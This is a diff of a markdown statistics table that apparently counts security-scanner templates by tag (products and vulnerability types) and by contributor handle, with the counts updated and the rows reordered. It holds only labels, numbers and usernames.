kishore-hariram | 2 | | | | | | | -| ruijie | 12 | nkxxkn | 2 | | | | | | | -| sonicwall | 11 | joeldeleep | 2 | | | | | | | -| online-fire-reporting | 11 | israel comazzetto dos reis | 2 | | | | | | | -| docker | 11 | myztique | 2 | | | | | | | -| npm | 11 | c3l3si4n | 2 | | | | | | | -| coldfusion | 11 | 0xsapra | 2 | | | | | | | -| cnvd2021 | 11 | coldfish | 2 | | | | | | | -| cisa | 11 | 0xnirvana | 2 | | | | | | | -| osint-video | 11 | d4vy | 2 | | | | | | | -| phpmyadmin | 11 | 0xrudra | 2 | | | | | | | -| setup | 11 | amsda | 2 | | | | | | | -| xstream | 11 | convisoappsec | 2 | | | | | | | -| jolokia | 10 | n-thumann | 2 | | | | | | | -| glpi | 10 | kre80r | 2 | | | | | | | -| spring | 10 | thardt-praetorian | 2 | | | | | | | -| django | 10 | m4lwhere | 2 | | | | | | | -| dedecms | 10 | dheerajmadhukar | 2 | | | | | | | -| dell | 10 | brenocss | 2 | | | | | | | -| bypass | 10 | gevakun | 2 | | | | | | | -| headless | 10 | hackerarpan | 2 | | | | | | | -| symfony | 10 | maximus decimus | 2 | | | | | | | -| ssh | 10 | korteke | 2 | | | | | | | -| solarview | 10 | geekby | 2 | | | | | | | -| ssti | 10 | bing0o | 2 | | | | | | | -| digitalocean | 10 | redteambrasil | 2 | | | | | | | -| db | 10 | y4er | 2 | | | | | | | -| zimbra | 10 | 0xsmiley | 2 | | | | | | | -| kube | 9 | k11h-de | 2 | | | | | | | -| opencats | 9 | megamansec | 2 | | | | | | | -| vcenter | 9 | kiblyn11 | 2 | | | | | | | -| windows | 9 | nvn1729 | 2 | | | | | | | -| redis | 9 | clarkvoss | 2 | | | | | | | -| osint-news | 9 | dogancanbakir | 2 | | | | | | | -| scada | 9 | socketz | 2 | | | | | | | -| installer | 9 | paradessia | 2 | | | | | | | -| gitea | 9 | uomogrande | 2 | | | | | | | -| cache | 9 | dbrwsky | 2 | | | | | | | -| firebase | 9 | ehsahil | 2 | | | | | | | -| wso2 | 9 | sinkettu | 2 | | | | | | | -| prometheus | 9 | wa1tf0rme | 2 | | | | | | | -| thinkphp | 9 | 8arthur | 2 | | | | | | | -| sitecore | 9 | heeress | 2 | | | | | | | -| versa | 9 | bsysop | 2 | | | | | | | -| zabbix | 9 | z0ne | 2 | | | | | | | -| iis | 9 | joshlarsen | 2 | | | | | | | -| fastjson | 9 | moritz nentwig | 2 | | | | | | | -| pfsense | 9 | ricardo maia (brainfork) | 2 | | | | | | | -| mirai | 8 | manas_harsh | 2 | | | | | | | -| metadata | 8 | martincodes-de | 2 | | | | | | | +| zyxel | 14 | dudez | 3 | | | | | | | +| osint-health | 14 | lark-lab | 3 | | | | | | | +| mail | 14 | whoever | 3 | | | | | | | +| osint-art | 14 | shifacyclewala | 3 | | | | | | | +| cve2013 | 14 | alifathi-h1 | 3 | | | | | | | +| domainmod | 14 | vsh00t | 3 | | | | | | | +| tokens | 13 | bernardofsr | 3 | | | | | | | +| cuppa | 13 | swissky | 3 | | | | | | | +| azure | 13 | fyoorer | 3 | | | | | | | +| laravel | 13 | davidmckennirey | 3 | | | | | | | +| fortigate | 13 | thomas_from_offensity | 3 | | | | | | | +| abstractapi | 13 | vagnerd | 3 | | | | | | | +| creds-stuffing | 13 | fxploit | 3 | | | | | | | +| osint-dating | 13 | andydoering | 3 | | | | | | | +| npm | 13 | lucasljm2001 | 3 | | | | | | | +| login-check | 13 | emenalf | 3 | | | | | | | +| osint-political | 13 | arcc | 3 | | | | | | | +| vpn | 12 | z3bd | 3 | | | | | | | +| dashboard | 12 | arm!tage | 3 | | | | | | | +| netsweeper | 12 | binaryfigments | 3 | | | | | | | +| netgear | 12 | cheesymoon | 3 | | | | | | | +| microweber | 12 | true13 | 3 | | | | | | | +| ruby | 12 | splint3r7 | 3 | | | | | | | +| airflow | 12 | badboycxcc | 3 | | | | | | | +| rails | 12 | ambassify | 3 | | | | | | | +| git | 12 | me9187 | 3 | | | | | | | +| webserver | 12 | unstabl3 | 3 | | | | | | | +| drupal | 12 | dr0pd34d | 3 | | | | | | | +| graphql | 12 | ekrause | 3 | | | | | | | +| grafana | 12 | atomiczsec | 3 | | | | | | | +| kafka | 12 | yash anand @yashanand155 | 3 | | | | | | | +| ruijie | 12 | heeress | 2 | | | | | | | +| auth | 12 | uomogrande | 2 | | | | | | | +| backdoor | 12 | brenocss | 2 | | | | | | | +| enum | 12 | nvn1729 | 2 | | | | | | | +| osint-video | 11 | lotusdll | 2 | | | | | | | +| setup | 11 | sbani | 2 | | | | | | | +| xstream | 11 | randomdhiraj | 2 | | | | | | | +| dell | 11 | paperpen | 2 | | | | | | | +| online-fire-reporting | 11 | danielmofer | 2 | | | | | | | +| sonicwall | 11 | pxmme1337 | 2 | | | | | | | +| cnvd2021 | 11 | zomsop82 | 2 | | | | | | | +| phpmyadmin | 11 | vavkamil | 2 | | | | | | | +| coldfusion | 11 | cocxanh | 2 | | | | | | | +| cisa | 11 | convisoappsec | 2 | | | | | | | +| docker | 11 | gtrrnr | 2 | | | | | | | +| glpi | 10 | hackerarpan | 2 | | | | | | | +| symfony | 10 | kre80r | 2 | | | | | | | +| thinkphp | 10 | k11h-de | 2 | | | | | | | +| django | 10 | thardt-praetorian | 2 | | | | | | | +| jolokia | 10 | 0xcrypto | 2 | | | | | | | +| dedecms | 10 | clarkvoss | 2 | | | | | | | +| zimbra | 10 | ree4pwn | 2 | | | | | | | +| db | 10 | ajaysenr | 2 | | | | | | | +| digitalocean | 10 | 666asd | 2 | | | | | | | +| solarview | 10 | coldfish | 2 | | | | | | | +| spring | 10 | w4cky_ | 2 | | | | | | | +| headless | 10 | luci | 2 | | | | | | | +| ssti | 10 | sascha brendel | 2 | | | | | | | +| ssh | 10 | ggranjus | 2 | | | | | | | +| prometheus | 9 | nybble04 | 2 | | | | | | | +| osint-news | 9 | dbrwsky | 2 | | | | | | | +| opencats | 9 | ehsahil | 2 | | | | | | | +| vcenter | 9 | myztique | 2 | | | | | | | +| redis | 9 | korteke | 2 | | | | | | | +| alibaba | 9 | 0xelkomy | 2 | | | | | | | +| versa | 9 | z0ne | 2 | | | | | | | +| fastjson | 9 | geekby | 2 | | | | | | | +| installer | 9 | joshlarsen | 2 | | | | | | | +| sitecore | 9 | nkxxkn | 2 | | | | | | | +| wso2 | 9 | paradessia | 2 | | | | | | | +| firebase | 9 | israel comazzetto dos reis | 2 | | | | | | | +| kube | 9 | joeldeleep | 2 | | | | | | | +| bypass | 9 | wa1tf0rme | 2 | | | | | | | +| pfsense | 9 | randomrobbie | 2 | | | | | | | +| cache | 9 | 0xsmiley | 2 | | | | | | | +| zabbix | 9 | y4er | 2 | | | | | | | +| gitea | 9 | j3ssie | 2 | | | | | | | +| windows | 9 | g4l1t0 | 2 | | | | | | | +| node | 9 | nuk3s3c | 2 | | | | | | | +| scada | 9 | github.com/its0x08 | 2 | | | | | | | +| iis | 9 | smaranchand | 2 | | | | | | | +| ognl | 8 | foulenzer | 2 | | | | | | | +| exchange | 8 | hetroublemakr | 2 | | | | | | | +| vbulletin | 8 | 0xnirvana | 2 | | | | | | | +| mirai | 8 | raesene | 2 | | | | | | | +| bucket | 8 | streetofhackerr007 | 2 | | | | | | | +| atom | 8 | 0xrudra | 2 | | | | | | | +| cisco-switch | 8 | udit_thakkur | 2 | | | | | | | +| jetbrains | 8 | c3l3si4n | 2 | | | | | | | +| config-audit | 8 | socketz | 2 | | | | | | | +| ecology | 8 | 0xsapra | 2 | | | | | | | +| cnvd2020 | 8 | dheerajmadhukar | 2 | | | | | | | | druid | 8 | dahse89 | 2 | | | | | | | -| unauthenticated | 8 | udit_thakkur | 2 | | | | | | | -| config-audit | 8 | bp0lr | 2 | | | | | | | -| jetbrains | 8 | lum8rjack | 2 | | | | | | | -| spotweb | 8 | randomrobbie | 2 | | | | | | | -| cnvd2020 | 8 | nybble04 | 2 | | | | | | | -| vbulletin | 8 | lotusdll | 2 | | | | | | | -| elasticsearch | 8 | pxmme1337 | 2 | | | | | | | -| emerge | 8 | 0xprial | 2 | | | | | | | -| default-page | 8 | j3ssie | 2 | | | | | | | -| crlf | 8 | ree4pwn | 2 | | | | | | | -| smtp | 8 | rafaelwdornelas | 2 | | | | | | | -| bucket | 8 | raesene | 2 | | | | | | | -| console | 8 | g4l1t0 | 2 | | | | | | | -| ecology | 8 | joshua rogers | 2 | | | | | | | -| solr | 8 | thezakman | 2 | | | | | | | -| ognl | 8 | github.com/its0x08 | 2 | | | | | | | -| oauth | 8 | notnotnotveg | 2 | | | | | | | -| hms | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| exchange | 8 | koti2 | 2 | | | | | | | -| cisco-switch | 8 | hetroublemakr | 2 | | | | | | | -| recon | 8 | cocxanh | 2 | | | | | | | -| icewarp | 8 | v0idc0de | 2 | | | | | | | -| atom | 8 | danielmofer | 2 | | | | | | | -| ofbiz | 7 | codexlynx | 2 | | | | | | | -| nagios | 7 | 0xcrypto | 2 | | | | | | | -| seeyon | 7 | cckuakilong | 2 | | | | | | | -| error | 7 | afaq | 2 | | | | | | | -| blind | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| shopify | 7 | vavkamil | 2 | | | | | | | -| malware | 7 | 0xelkomy | 2 | | | | | | | -| samsung | 7 | streetofhackerr007 | 2 | | | | | | | -| squirrelmail | 7 | mohammedsaneem | 2 | | | | | | | -| manager | 7 | shelled | 2 | | | | | | | -| nagiosxi | 7 | paperpen | 2 | | | | | | | -| websphere | 7 | parth | 2 | | | | | | | -| gogs | 7 | smaranchand | 2 | | | | | | | -| go | 7 | foulenzer | 2 | | | | | | | -| avtech | 7 | sy3omda | 2 | | | | | | | -| fortios | 7 | bananabr | 2 | | | | | | | -| huawei | 7 | zomsop82 | 2 | | | | | | | -| maps | 7 | luci | 2 | | | | | | | -| ec2 | 7 | nuk3s3c | 2 | | | | | | | -| vms | 7 | supras | 2 | | | | | | | -| sophos | 7 | 666asd | 2 | | | | | | | -| odoo | 7 | w4cky_ | 2 | | | | | | | -| slack | 6 | gal nagli | 2 | | | | | | | -| jamf | 6 | x1m_martijn | 2 | | | | | | | -| moodle | 6 | sbani | 2 | | | | | | | -| minio | 6 | sascha brendel | 2 | | | | | | | -| opensis | 6 | ajaysenr | 2 | | | | | | | -| nexus | 6 | randomdhiraj | 2 | | | | | | | -| solarwinds | 6 | brucelsone | 2 | | | | | | | -| elfinder | 6 | micha3lb3n | 1 | | | | | | | -| fpd | 6 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| artica | 6 | ahmed sherif | 1 | | | | | | | -| plesk | 6 | kaizensecurity | 1 | | | | | | | -| lucee | 6 | w0tx | 1 | | | | | | | -| magmi | 6 | mesaglio | 1 | | | | | | | -| database | 6 | rivalsec | 1 | | | | | | | -| mongodb | 6 | akash.c | 1 | | | | | | | -| pmb | 6 | pdp | 1 | | | | | | | -| rconfig | 6 | sinsinology | 1 | | | | | | | -| s3 | 6 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| keycloak | 6 | secthebit | 1 | | | | | | | -| doctor-appointment-system | 6 | ndmalc | 1 | | | | | | | -| microstrategy | 6 | juliosmelo | 1 | | | | | | | -| symantec | 6 | topscoder | 1 | | | | | | | -| bigip | 6 | ph33rr | 1 | | | | | | | -| activemq | 6 | dale clarke | 1 | | | | | | | -| newrelic | 6 | brabbit10 | 1 | | | | | | | -| leak | 6 | mass0ma | 1 | | | | | | | -| python | 6 | omarjezi | 1 | | | | | | | -| kubelet | 6 | x6263 | 1 | | | | | | | -| jeecg | 6 | affix | 1 | | | | | | | -| jetty | 6 | metascan | 1 | | | | | | | -| openvpn | 6 | alperenkesk | 1 | | | | | | | -| filemanager | 6 | freakyclown | 1 | | | | | | | -| node | 6 | vinit989 | 1 | | | | | | | -| cobbler | 6 | ipanda | 1 | | | | | | | -| liferay | 6 | duty_1g | 1 | | | | | | | -| zhiyuan | 6 | higor melgaço (eremit4) | 1 | | | | | | | -| typo3 | 5 | tea | 1 | | | | | | | -| rseenet | 5 | mukundbhuva | 1 | | | | | | | -| apisix | 5 | xstp | 1 | | | | | | | -| elastic | 5 | gboddin | 1 | | | | | | | -| adminer | 5 | skylark-lab | 1 | | | | | | | -| rfi | 5 | elitebaz | 1 | | | | | | | -| hybris | 5 | imhunterand | 1 | | | | | | | -| cockpit | 5 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| circarlife | 5 | sickwell | 1 | | | | | | | -| awstats | 5 | elouhi | 1 | | | | | | | -| nacos | 5 | shelld3v | 1 | | | | | | | -| gocd | 5 | kr1shna4garwal | 1 | | | | | | | -| storage | 5 | evan rubinstien | 1 | | | | | | | -| firmware | 5 | lingtren | 1 | | | | | | | -| strapi | 5 | mah3sec_ | 1 | | | | | | | -| avaya | 5 | keni0k | 1 | | | | | | | -| hikvision | 5 | berkdusunur | 1 | | | | | | | -| parallels | 5 | mariam tariq | 1 | | | | | | | -| sql | 5 | nytr0gen | 1 | | | | | | | -| ruckus | 5 | blckraven | 1 | | | | | | | -| geoserver | 5 | ramondunker | 1 | | | | | | | -| resin | 5 | hardik-rathod | 1 | | | | | | | -| square | 5 | allenwest24 | 1 | | | | | | | -| heroku | 5 | iampritam | 1 | | | | | | | -| facebook | 5 | noamrathaus | 1 | | | | | | | -| akamai | 5 | arjunchandarana | 1 | | | | | | | -| metinfo | 5 | realexp3rt | 1 | | | | | | | -| server | 5 | lixts | 1 | | | | | | | -| caucho | 5 | liquidsec | 1 | | | | | | | -| microfocus | 5 | elder tao | 1 | | | | | | | -| hashicorp | 5 | y0no | 1 | | | | | | | -| tikiwiki | 5 | jaskaran | 1 | | | | | | | -| fatpipe | 5 | ynnirc | 1 | | | | | | | -| prestashop | 5 | patrick pirker | 1 | | | | | | | -| kkfileview | 5 | ofjaaah | 1 | | | | | | | -| 74cms | 5 | 0xceba | 1 | | | | | | | -| avideo | 5 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| vrealize | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| cacti | 5 | couskito | 1 | | | | | | | -| paypal | 5 | sleepingbag945 | 1 | | | | | | | -| carrental | 5 | thelicato | 1 | | | | | | | -| openemr | 5 | lrtk-coder | 1 | | | | | | | -| alibaba | 5 | sec_hawk | 1 | | | | | | | -| telesquare | 4 | andysvints | 1 | | | | | | | -| webmin | 4 | marcos_iaf | 1 | | | | | | | -| mailchimp | 4 | tirtha_mandal | 1 | | | | | | | -| log | 4 | zy9ard3 | 1 | | | | | | | -| stored | 4 | zhenwarx | 1 | | | | | | | -| httpserver | 4 | tehtbl | 1 | | | | | | | -| roxy | 4 | nagli | 1 | | | | | | | -| centos | 4 | barthy.koeln | 1 | | | | | | | -| stripe | 4 | houdinis | 1 | | | | | | | -| mikrotik | 4 | shivampand3y | 1 | | | | | | | -| oa | 4 | dmartyn | 1 | | | | | | | -| grav | 4 | danigoland | 1 | | | | | | | -| cve2005 | 4 | wabafet | 1 | | | | | | | -| panos | 4 | aringo | 1 | | | | | | | -| cnvd2019 | 4 | ayadi | 1 | | | | | | | -| asp | 4 | co0nan | 1 | | | | | | | -| royalevent | 4 | team syslifters / christoph | 1 | | | | | | | -| | | mahrl | | | | | | | | -| churchcrm | 4 | undefl0w | 1 | | | | | | | -| pie-register | 4 | dk999 | 1 | | | | | | | -| cve2007 | 4 | mhdsamx | 1 | | | | | | | -| voip | 4 | zinminphy0 | 1 | | | | | | | -| ems | 4 | ptonewreckin | 1 | | | | | | | -| bmc | 4 | amnotacat | 1 | | | | | | | -| artifactory | 4 | ramkrishna sawant | 1 | | | | | | | -| powerjob | 4 | hexcat | 1 | | | | | | | -| postmessage | 4 | narluin | 1 | | | | | | | -| horde | 4 | aayush vishnoi | 1 | | | | | | | -| openfire | 4 | vzamanillo | 1 | | | | | | | -| consul | 4 | ransomsec | 1 | | | | | | | -| mlflow | 4 | fq_hsu | 1 | | | | | | | -| tenda | 4 | 0h1in9e | 1 | | | | | | | -| gnuboard | 4 | remonsec | 1 | | | | | | | -| zend | 4 | rojanrijal | 1 | | | | | | | -| ebs | 4 | harshinsecurity | 1 | | | | | | | -| mautic | 4 | yashgoti | 1 | | | | | | | -| telerik | 4 | alevsk | 1 | | | | | | | -| beyondtrust | 4 | therealtoastycat | 1 | | | | | | | -| puppet | 4 | alexrydzak | 1 | | | | | | | -| dropbear | 4 | lark lab | 1 | | | | | | | -| osint-archived | 4 | jas37 | 1 | | | | | | | -| mysql | 4 | lethargynavigator | 1 | | | | | | | -| candidats | 4 | yuansec | 1 | | | | | | | -| jellyfin | 4 | aresx | 1 | | | | | | | -| aspose | 4 | petergrifin | 1 | | | | | | | -| mostra | 4 | ling | 1 | | | | | | | -| xmlrpc | 4 | petruknisme | 1 | | | | | | | -| sangfor | 4 | dwbzn | 1 | | | | | | | -| tokens | 4 | davidfegyver | 1 | | | | | | | -| nosqli | 4 | shreyapohekar | 1 | | | | | | | -| kibana | 4 | higor melgaço | 1 | | | | | | | -| hongdian | 4 | dawid-czarnecki | 1 | | | | | | | -| arcgis | 4 | wlayzz | 1 | | | | | | | -| pixie | 4 | aaronchen0 | 1 | | | | | | | -| linkerd | 4 | screamy | 1 | | | | | | | -| aura | 4 | ohlinge | 1 | | | | | | | -| nextjs | 4 | exid | 1 | | | | | | | -| seagate | 4 | majidmc2 | 1 | | | | | | | -| spark | 4 | evolutionsec | 1 | | | | | | | -| httpd | 4 | makyotox | 1 | | | | | | | -| flink | 4 | tirtha | 1 | | | | | | | -| elementor | 4 | willd96 | 1 | | | | | | | -| search | 4 | charanrayudu | 1 | | | | | | | -| sonarqube | 4 | af001 | 1 | | | | | | | -| yeswiki | 4 | ayadim | 1 | | | | | | | -| codeigniter | 4 | supr4s | 1 | | | | | | | -| wcs | 4 | nielsing | 1 | | | | | | | -| dolibarr | 4 | philippdelteil | 1 | | | | | | | -| froxlor | 4 | shockwave | 1 | | | | | | | -| couchdb | 4 | piyushchhiroliya | 1 | | | | | | | -| kevinlab | 4 | luqman | 1 | | | | | | | -| zte | 4 | 8authur | 1 | | | | | | | -| pentaho | 4 | zeyad azima | 1 | | | | | | | -| photo | 4 | breno_css | 1 | | | | | | | -| phpinfo | 4 | kabirsuda | 1 | | | | | | | -| concrete | 4 | s1r1u5_ | 1 | | | | | | | -| javascript | 4 | remi gascou (podalirius) | 1 | | | | | | | -| tls | 4 | kchason | 1 | | | | | | | -| ldap | 4 | b4uh0lz | 1 | | | | | | | -| thinkcmf | 4 | thevillagehacker | 1 | | | | | | | -| axigen | 4 | bjhulst | 1 | | | | | | | -| springcloud | 4 | viondexd | 1 | | | | | | | -| bitbucket | 4 | 0xtavian | 1 | | | | | | | -| terramaster | 4 | kiransau | 1 | | | | | | | -| sendgrid | 4 | bad5ect0r | 1 | | | | | | | -| age-encryption | 4 | queencitycyber | 1 | | | | | | | -| prtg | 4 | jbaines-r7 | 1 | | | | | | | -| redmine | 4 | 0xceeb | 1 | | | | | | | -| kentico | 4 | ggranjus | 1 | | | | | | | -| phppgadmin | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | -| rabbitmq | 4 | d0rkerdevil | 1 | | | | | | | -| jupyter | 4 | rschio | 1 | | | | | | | -| ampache | 4 | absshax | 1 | | | | | | | -| express | 4 | arr0way | 1 | | | | | | | -| mostracms | 4 | pjborah | 1 | | | | | | | -| hpe | 4 | kareemse1im | 1 | | | | | | | -| umbraco | 4 | spac3wh1te | 1 | | | | | | | -| newstatpress | 4 | iphantasmic | 1 | | | | | | | -| goanywhere | 4 | xeldax | 1 | | | | | | | -| hoteldruid | 4 | kagamigawa | 1 | | | | | | | -| cloudflare | 4 | rodnt | 1 | | | | | | | -| xerox | 3 | palanichamy_perumal | 1 | | | | | | | -| shiro | 3 | jc175 | 1 | | | | | | | -| voipmonitor | 3 | exceed | 1 | | | | | | | -| sony | 3 | noobexploiter | 1 | | | | | | | -| spip | 3 | revblock | 1 | | | | | | | -| smb | 3 | rotemreiss | 1 | | | | | | | -| axway | 3 | luqmaan hadia | 1 | | | | | | | -| metabase | 3 | fopina | 1 | | | | | | | -| subrion | 3 | william söderberg @ withsecure | 1 | | | | | | | -| digitalrebar | 3 | mr. bobo hp | 1 | | | | | | | -| targa | 3 | qlkwej | 1 | | | | | | | -| ansible | 3 | florianmaak | 1 | | | | | | | -| webadmin | 3 | michael wedl | 1 | | | | | | | -| magnolia | 3 | push4d | 1 | | | | | | | -| nortek | 3 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| angular | 3 | sshell | 1 | | | | | | | -| ivanti | 3 | flag007 | 1 | | | | | | | -| backdrop | 3 | phyr3wall | 1 | | | | | | | -| circleci | 3 | b0yd | 1 | | | | | | | -| webmail | 3 | lamscun | 1 | | | | | | | -| asus | 3 | zandros0 | 1 | | | | | | | -| payara | 3 | miryangjung | 1 | | | | | | | -| fileman | 3 | xcapri | 1 | | | | | | | -| matrix | 3 | shifacyclewla | 1 | | | | | | | -| getsimple | 3 | p-l- | 1 | | | | | | | -| proftpd | 3 | deena | 1 | | | | | | | -| segment | 3 | yashanand155 | 1 | | | | | | | -| purchase-order | 3 | djoevanka | 1 | | | | | | | -| superset | 3 | retr02332 | 1 | | | | | | | -| aria | 3 | mantissts | 1 | | | | | | | -| clusterengine | 3 | natto97 | 1 | | | | | | | -| eshop | 3 | f1she3 | 1 | | | | | | | -| linksys | 3 | knassar702 | 1 | | | | | | | -| metersphere | 3 | francescocarlucci | 1 | | | | | | | -| empirecms | 3 | paper-pen | 1 | | | | | | | -| panabit | 3 | 0xrod | 1 | | | | | | | -| processwire | 3 | caon | 1 | | | | | | | -| jwt | 3 | hakluke | 1 | | | | | | | -| sentry | 3 | noraj | 1 | | | | | | | -| graph | 3 | fmunozs | 1 | | | | | | | -| wbce | 3 | furkansayim | 1 | | | | | | | -| selenium | 3 | 1nf1n7y | 1 | | | | | | | -| lansweeper | 3 | irshadahamed | 1 | | | | | | | -| totolink | 3 | izn0u | 1 | | | | | | | -| zerof | 3 | viniciuspereiras | 1 | | | | | | | -| messaging | 3 | shiva (strobes security) | 1 | | | | | | | -| dotcms | 3 | 0xteles | 1 | | | | | | | -| bigant | 3 | dhiyaneshdki | 1 | | | | | | | -| teamcity | 3 | failopen | 1 | | | | | | | -| intercom | 3 | dabla | 1 | | | | | | | -| monstra | 3 | tim_koopmans | 1 | | | | | | | -| twitter | 3 | pudsec | 1 | | | | | | | -| wordfence | 3 | ola456 | 1 | | | | | | | -| buffalo | 3 | igibanez | 1 | | | | | | | -| labkey | 3 | jbertman | 1 | | | | | | | -| jeesns | 3 | esonhugh | 1 | | | | | | | -| unifi | 3 | momen eldawakhly | 1 | | | | | | | -| redash | 3 | act1on3 | 1 | | | | | | | -| pulsar | 3 | chron0x | 1 | | | | | | | -| credential | 3 | patralos | 1 | | | | | | | -| tableau | 3 | jcockhren | 1 | | | | | | | -| waf | 3 | dali | 1 | | | | | | | -| temenos | 3 | unp4ck | 1 | | | | | | | -| modem | 3 | hazana | 1 | | | | | | | -| mobileiron | 3 | anon-artist | 1 | | | | | | | -| bruteforce | 3 | notsoevilweasel | 1 | | | | | | | -| kfm | 3 | colbyjack1134 | 1 | | | | | | | -| securepoint | 3 | gpiechnik2 | 1 | | | | | | | -| harbor | 3 | sherlocksecurity | 1 | | | | | | | -| fanruan | 3 | udyz | 1 | | | | | | | -| openai | 3 | andirrahmani1 | 1 | | | | | | | -| openam | 3 | aron molnar | 1 | | | | | | | -| synology | 3 | mrcl0wnlab | 1 | | | | | | | -| aptus | 3 | geraldino2 | 1 | | | | | | | -| pega | 3 | daffianfo | 1 | | | | | | | -| password | 3 | xshuden | 1 | | | | | | | -| figma | 3 | jrolf | 1 | | | | | | | -| r-seenet | 3 | ahmetpergamum | 1 | | | | | | | -| mantisbt | 3 | intx0x80 | 1 | | | | | | | -| selea | 3 | manasmbellani | 1 | | | | | | | -| superadmin | 3 | infosecsanyam | 1 | | | | | | | -| listserv | 3 | jeya seelan | 1 | | | | | | | -| etcd | 3 | 5up3r541y4n | 1 | | | | | | | -| influxdb | 3 | bugvsme | 1 | | | | | | | -| openbmcs | 3 | jteles | 1 | | | | | | | -| mapbox | 3 | kiks7 | 1 | | | | | | | -| linux | 3 | justmumu | 1 | | | | | | | -| ueditor | 3 | 0xh7ml | 1 | | | | | | | -| cluster | 3 | sak1 | 1 | | | | | | | -| pip | 3 | prettyboyaaditya | 1 | | | | | | | -| nuuo | 3 | jeya.seelan | 1 | | | | | | | -| lotus | 3 | sicksec | 1 | | | | | | | -| ampps | 3 | hakimkt | 1 | | | | | | | -| webcam | 3 | nuts7 | 1 | | | | | | | -| fuelcms | 3 | _c0wb0y_ | 1 | | | | | | | -| mailgun | 3 | 0ut0fb4nd | 1 | | | | | | | -| carel | 3 | h4kux | 1 | | | | | | | -| yonyou | 3 | oscarintherocks | 1 | | | | | | | -| globalprotect | 3 | kailashbohara | 1 | | | | | | | -| steve | 3 | adrianmf | 1 | | | | | | | -| upload | 3 | compr00t | 1 | | | | | | | -| qnap | 3 | retr0 | 1 | | | | | | | -| netdata | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| axis2 | 3 | matthew nickerson (b0than) @ | 1 | | | | | | | +| metadata | 8 | ricardo maia (brainfork) | 2 | | | | | | | +| crlf | 8 | m4lwhere | 2 | | | | | | | +| icewarp | 8 | moritz nentwig | 2 | | | | | | | +| smtp | 8 | parth | 2 | | | | | | | +| solr | 8 | bananabr | 2 | | | | | | | +| elasticsearch | 8 | v0idc0de | 2 | | | | | | | +| hms | 8 | kiblyn11 | 2 | | | | | | | +| emerge | 8 | supras | 2 | | | | | | | +| spotweb | 8 | kishore-hariram | 2 | | | | | | | +| console | 8 | brucelsone | 2 | | | | | | | +| unauthenticated | 8 | d4vy | 2 | | | | | | | +| oauth | 8 | lum8rjack | 2 | | | | | | | +| recon | 8 | n-thumann | 2 | | | | | | | +| keys | 8 | mohammedsaneem | 2 | | | | | | | +| default-page | 8 | koti2 | 2 | | | | | | | +| shopify | 7 | afaq | 2 | | | | | | | +| squirrelmail | 7 | bp0lr | 2 | | | | | | | +| nagiosxi | 7 | 0xprial | 2 | | | | | | | +| error | 7 | megamansec | 2 | | | | | | | +| nagios | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| go | 7 | bing0o | 2 | | | | | | | +| blind | 7 | rafaelwdornelas | 2 | | | | | | | +| malware | 7 | gal nagli | 2 | | | | | | | +| huawei | 7 | martincodes-de | 2 | | | | | | | +| maps | 7 | redteambrasil | 2 | | | | | | | +| ec2 | 7 | dogancanbakir | 2 | | | | | | | +| gogs | 7 | amsda | 2 | | | | | | | +| sophos | 7 | sinkettu | 2 | | | | | | | +| seeyon | 7 | manas_harsh | 2 | | | | | | | +| websphere | 7 | bsysop | 2 | | | | | | | +| vms | 7 | shelled | 2 | | | | | | | +| ofbiz | 7 | gevakun | 2 | | | | | | | +| avtech | 7 | joshua rogers | 2 | | | | | | | +| manager | 7 | codexlynx | 2 | | | | | | | +| samsung | 7 | cckuakilong | 2 | | | | | | | +| fortios | 7 | x1m_martijn | 2 | | | | | | | +| odoo | 7 | thezakman | 2 | | | | | | | +| jeecg | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| database | 6 | 8arthur | 2 | | | | | | | +| liferay | 6 | sy3omda | 2 | | | | | | | +| symantec | 6 | maximus decimus | 2 | | | | | | | +| leak | 6 | notnotnotveg | 2 | | | | | | | +| mongodb | 6 | fopina | 1 | | | | | | | +| microstrategy | 6 | qlkwej | 1 | | | | | | | +| s3 | 6 | ola456 | 1 | | | | | | | +| jetty | 6 | skylark-lab | 1 | | | | | | | +| kubelet | 6 | omarjezi | 1 | | | | | | | +| activemq | 6 | 1nf1n7y | 1 | | | | | | | +| rconfig | 6 | spac3wh1te | 1 | | | | | | | +| slack | 6 | exid | 1 | | | | | | | +| magmi | 6 | juliosmelo | 1 | | | | | | | +| openvpn | 6 | bartu utku sarp | 1 | | | | | | | +| zhiyuan | 6 | natto97 | 1 | | | | | | | +| tikiwiki | 6 | ahmed sherif | 1 | | | | | | | +| lucee | 6 | elmahdi | 1 | | | | | | | +| filemanager | 6 | sicksec | 1 | | | | | | | +| opensis | 6 | mass0ma | 1 | | | | | | | +| moodle | 6 | ringo | 1 | | | | | | | +| nexus | 6 | opencirt | 1 | | | | | | | +| python | 6 | osamahamad | 1 | | | | | | | +| plesk | 6 | bibeksapkota (sar00n) | 1 | | | | | | | +| keycloak | 6 | petergrifin | 1 | | | | | | | +| doctor-appointment-system | 6 | hazana | 1 | | | | | | | +| pmb | 6 | 0h1in9e | 1 | | | | | | | +| secret | 6 | iampritam | 1 | | | | | | | +| minio | 6 | jas37 | 1 | | | | | | | +| fpd | 6 | udyz | 1 | | | | | | | +| newrelic | 6 | alperenkesk | 1 | | | | | | | +| cobbler | 6 | tirtha | 1 | | | | | | | +| jamf | 6 | mrharshvardhan | 1 | | | | | | | +| solarwinds | 6 | unp4ck | 1 | | | | | | | +| bigip | 6 | thebinitghimire | 1 | | | | | | | +| artica | 6 | queencitycyber | 1 | | | | | | | +| elfinder | 6 | official_blackhat13 | 1 | | | | | | | +| adminer | 5 | alexrydzak | 1 | | | | | | | +| facebook | 5 | thevillagehacker | 1 | | | | | | | +| akamai | 5 | paper-pen | 1 | | | | | | | +| rseenet | 5 | 5up3r541y4n | 1 | | | | | | | +| cacti | 5 | dhiyaneshdki | 1 | | | | | | | +| caucho | 5 | sec_hawk | 1 | | | | | | | +| resin | 5 | zsusac | 1 | | | | | | | 